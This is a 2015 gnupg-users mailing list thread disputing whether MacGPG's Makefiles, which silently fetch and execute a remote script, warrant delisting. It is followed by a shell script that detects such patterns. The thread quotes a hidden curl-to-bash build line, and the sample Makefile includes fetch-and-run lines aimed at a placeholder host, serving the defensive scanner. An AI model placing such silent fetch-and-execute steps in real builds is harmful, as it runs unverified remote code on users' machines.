If you have concerns or suggestions then the best thing would be to contact Luke Le, Steve or the other support staff on
http://support.gpgtools.org/

Sandeep Murthy
s.mur...@mykolab.com

> Begin forwarded message:
>
> Subject: Re: Please remove MacGPG from gnupg.org due to serious security concerns
> From: Sandeep Murthy <s.mur...@mykolab.com>
> Date: 16 February 2015 23:16:06 GMT
> Cc: js-gnupg-us...@webkeks.org
> To: gnupg-users@gnupg.org
>
> Hi
>
> I think this is an exaggeration. I have been using MacGPG and the
> GPG Tools support forum for quite some time, and have brought a
> number of issues to their attention, including a couple of security
> related ones, like making their key fingerprints more visible.
>
> They do care about security and are very responsive to posts on the
> GPG Tools support forum
>
> http://support.gpgtools.org/
>
> The GitHub issues page for MacGPG is not the main place where
> issues are raised; it's actually the support forum, where there are
> lots of other resources as well.
>
> Sandeep Murthy
> s.mur...@mykolab.com
>
>> On 16 Feb 2015, at 21:48, Jonathan Schleifer <js-gnupg-us...@webkeks.org> wrote:
>>
>> Hi!
>>
>> I hereby request that MacGPG gets removed from gnupg.org due to serious
>> security concerns. Basically, the first thing the Makefile in all their
>> repos / tarballs does is this:
>>
>> @bash -c "$$(curl -fsSL https://raw.github.com/GPGTools/GPGTools_Core/master/newBuildSystem/prepare-core.sh)"
>>
>> So you type make not expecting anything bad (you verified the checksum and
>> everything), but you just executed remote code. Great. And they even hide it
>> from you by prefixing it with @, which is downright evil. So you never
>> notice unless you look at the Makefile. Currently, that script clones
>> another common repo using the unverified git:// protocol (because, why use
>> submodules if you can do it in an insecure way?), but obviously, that can
>> change any minute and could change just for certain IPs etc.
>>
>> The developer(s) don't allow any issues on GitHub, so I tried contacting
>> them by other means (e.g. Twitter), only to get ignored. They clearly don't
>> care about security.
>>
>> In any case, somebody who does something like this clearly doesn't care
>> about security in the least. The potential for backdoors is extremely high and
>> I think nobody should be using any software written by this developer /
>> these developer(s), as they clearly demonstrated that they couldn't care
>> less about your security.
>>
>> I don't feel comfortable that the majority of Mac users are using this
>> software which doesn't care for security at all, but is used for extremely
>> security sensitive tasks. I guess this is because gnupg.org recommends it
>> and therefore people think it's safe. I think gnupg.org should do the
>> contrary instead and strongly discourage using it.
>>
>> --
>> Jonathan
>>
>>
>> _______________________________________________
>> Gnupg-users mailing list
>> Gnupg-users@gnupg.org
>> http://lists.gnupg.org/mailman/listinfo/gnupg-users
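The Makefile line quoted in Jonathan Schleifer's message is a build-time fetch-and-execute: typing make downloads a script over the network and runs it, and the leading @ keeps make from echoing the command, so a checksum verified on the tarball says nothing about the code that actually executes. The POSIX shell script below is an added example, not part of this thread and not GPGTools' code: it scans a Makefile for recipe lines that pipe or command-substitute curl/wget output into a shell, or that use the unauthenticated git:// transport, and reports whether each hit is silenced with @. The sample Makefile it writes is constructed here for the demonstration, uses the placeholder host example.invalid rather than the real URL, and includes a "safe" target (a vendored script checked against a local sha256 file) as the contrast that the scanner should not flag.

```shell
#!/bin/sh
# Added example: audit a Makefile for recipes that fetch and run remote code.
# Not taken from the gnupg-users thread or from any GPGTools repository.

# Write a constructed sample Makefile to the path in $1. Recipe lines must
# start with a tab, so printf escapes are used rather than a heredoc.
make_sample() {
  {
    printf 'all:\n'
    printf '\t@bash -c "$$(curl -fsSL https://example.invalid/prepare-core.sh)"\n'
    printf '\t$(MAKE) -C src\n\n'
    printf 'fetch:\n'
    printf '\twget -O - http://example.invalid/x.sh | sh\n'
    printf '\tgit clone git://example.invalid/common.git\n\n'
    printf 'safe:\n'
    printf '\tsha256sum -c vendored/prepare-core.sh.sha256\n'
    printf '\tsh vendored/prepare-core.sh\n'
  } > "$1"
}

# Print one line per suspicious recipe as "<line>\t<silenced|visible>\t<text>"
# and exit 0 if anything was found, 1 otherwise. Heuristics, in order:
#   1. curl/wget output piped into sh, bash, zsh or dash
#   2. curl/wget inside $(...) or the Makefile-escaped $$(...)
#   3. any use of the unauthenticated git:// transport
# A recipe whose first character is @ is not echoed by make, which is how the
# fetch stays invisible during a normal build.
scan_makefile() {
  awk '
    /^\t/ {
      line = $0
      sub(/^\t[ \t]*/, "", line)
      silenced = (substr(line, 1, 1) == "@") ? "silenced" : "visible"
      if (line ~ /(curl|wget)[^|]*\|[ \t]*(ba|z|da)?sh([ \t]|$)/ ||
          line ~ /\$\$?\([ \t]*(curl|wget)/ ||
          line ~ /git:\/\//) {
        printf "%d\t%s\t%s\n", NR, silenced, line
        hits++
      }
    }
    END { if (hits) exit 0; exit 1 }
  ' "$1"
}

# Stand-alone usage: build the sample and scan it.
tmp=$(mktemp)
make_sample "$tmp"
scan_makefile "$tmp"
rm -f "$tmp"
```

Run against a real tree with `find . -name Makefile -exec sh -c 'scan_makefile "$1"' _ {} \;` after sourcing the functions; any "silenced" hit that reaches the network is the pattern the thread is complaining about, and the fix is the one the "safe" target sketches: vendor the script, pin its digest in the repository, and verify before executing.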